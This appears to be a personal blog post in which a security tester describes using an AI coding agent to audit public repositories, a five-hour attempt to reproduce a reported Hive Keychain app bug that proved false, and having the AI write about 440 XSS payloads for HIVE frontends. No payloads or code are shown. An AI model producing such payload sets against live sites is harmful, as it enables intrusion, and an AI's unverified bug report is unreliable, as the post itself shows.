I’ve had the full version of Claude Max Coding AI running since this morning and, of course, I’ve already started working on various projects. After setting up my work environments (a virtual machine with Kali Linux for penetration testing), I examined a few publicly available repositories. In some repos, I was actually able to dig even deeper and find relatively serious bugs in the code. Of course, I immediately packaged these into a report after reviewing them and deeming them worthy.
And naturally, I made the audits available to the affected projects. But I’m already noticing that it’s kind of addictive—it’s fast, efficient, and works meticulously. But beyond the simple “do this, do that,” you still have to invest a lot of time yourself to double-check the results. That’s actually the part that takes up a lot of time. For example, I spent about 5 hours trying to reproduce a bug that Claude reported in the Hive Keychain mobile app. To do this, I had to try a few things using my phone, a USB cable, and an Android SDK.
The PoC (Proof of Concept) code looked very promising at first—but it turned out there wasn’t actually a bug there. Still, I’d rather have something I can test myself, so I tried it out right away, and I’d rather spend time fixing a potential bug than have it go unnoticed and cause more serious damage.
Since I’ve had to deal with HIVE frontends time and time again in the past, I decided to ask Claude to write me a few more creative payloads for XSS attacks and vulnerability testing. The result is around 440 unique XSS approaches that can be tested against HIVE’s various frontends. Developers know how to do this.
I'm curious to see what comes out of using the Claude AI agent over the next few days. It's going to be exciting!